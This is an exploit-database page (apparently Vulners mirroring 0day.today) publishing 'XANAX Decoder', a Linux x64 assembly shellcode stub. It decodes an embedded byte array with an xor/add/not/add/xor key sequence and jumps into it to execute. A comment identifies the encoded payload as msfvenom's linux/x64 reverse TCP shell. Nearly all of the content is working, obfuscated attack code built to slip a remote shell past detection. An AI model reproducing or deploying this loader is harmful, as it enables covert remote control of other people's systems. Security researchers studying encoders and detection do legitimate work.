Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Linux/x64 - XANAX Decoder Shellcode (127 bytes)

🗓️ 09 Apr 2019 00:00:00Reported by Alan VivonaType 
zdt
 zdt🔗 0day.today👁 26 Views

Linux/x64 XANAX Decoder Shellcode (127 bytes). Reverts the xor-add-not-add-xor sequence with 4 byte key for executing encoded payload

Code
Linux/x64 - XANAX Decoder Shellcode (127 bytes)

; Date: 08/04/2019
; XANAX Decoder
; Author: Alan Vivona
; Description: Reverts the xor-add-not-add-xor sequence using the same 4 byte key and executes the encoded payload. 
; Tested on: x86-x64 GNU/Linux
 
global _start
 
section .text
 
keys.xor1 equ 0x29
keys.add1 equ 0xff
keys.xor2 equ 0x50
keys.add2 equ 0x05
 
; xanax encoded payload
payload.len equ 74 ; this can't be over 127 bytes otherwise it will procude nullbytes
 
_start:
 
    jmp encode_setup
    ; msfvenom -a x64 --platform linux -p linux/x64/shell_reverse_tcp -f hex
    ; Encoded using XANAX Encoder:
    payload_start: db  0x92, 0x55, 0xc4, 0x05, 0x92, 0x8a, 0xdf, 0x92, 0x8d, 0xde, 0x8f, 0x89, 0xf4, 0x17, 0xf4, 0x25, 0x8a, 0x8c, 0x9d, 0xc0, 0xff, 0x8c, 0x8c, 0x8d, 0xdd, 0xf4, 0x35, 0x66, 0x92, 0x9c, 0xc2, 0x92, 0x52, 0xc4, 0x8f, 0x89, 0x92, 0x8b, 0xde, 0xf4, 0x7f, 0x4e, 0x92, 0xad, 0xc4, 0x8f, 0x89, 0xf9, 0x76, 0x92, 0xa3, 0xc4, 0x05, 0xf4, 0x23, 0xaf, 0xea, 0x95, 0xee, 0xaf, 0xfb, 0x94, 0x8c, 0xdb, 0xf4, 0x35, 0x67, 0xda, 0xd7, 0xf4, 0x35, 0x66, 0x8f, 0x89
     
    encode_setup:
    xor rcx, rcx
    lea rsi, [rel payload_start]
    encode:    
        mov al, byte [rsi+rcx]
        ; XANAX encoding (xor add neg add xor)
        xor al, keys.xor2
        sub al, keys.add2
        not al
        sub al, keys.add1
        xor al, keys.xor1
 
        mov byte [rsi+rcx], al
 
        inc rcx
        cmp rcx, payload.len
        jne encode
 
    ; Execute payload
    jmp rsi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
09 Apr 2019 00:00Current
0.5Low risk
Vulners AI Score0.5
xanax decoderxor sequence4 byte keyencoded payloadshellcodelinux/x64alan vivonasecurity document
26